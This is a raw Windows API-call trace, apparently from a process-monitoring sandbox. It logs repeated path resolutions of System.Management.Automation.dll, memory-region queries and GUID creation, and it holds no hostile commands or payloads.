	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.660] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.660] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.661] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xceaa0bc2, Data2=0x4b89, Data3=0x42f3, Data4=([0]=0x9b, [1]=0x68, [2]=0x95, [3]=0xf0, [4]=0x34, [5]=0xa8, [6]=0xe5, [7]=0x21))) returned 0x0
	[0351.661] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.662] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.662] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.662] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.663] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.664] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.664] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.665] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] VirtualQuery (in: lpAddress=0x1cbf00, lpBuffer=0x1ccdc0, dwLength=0x30 | out: lpBuffer=0x1ccdc0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.665] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.666] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.666] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.666] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.667] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x8342310b, Data2=0x6bd3, Data3=0x4921, Data4=([0]=0xa0, [1]=0x0, [2]=0x2f, [3]=0xee, [4]=0x5d, [5]=0x55, [6]=0x38, [7]=0x5d))) returned 0x0
	[0351.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.667] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.667] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.667] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.667] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.668] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
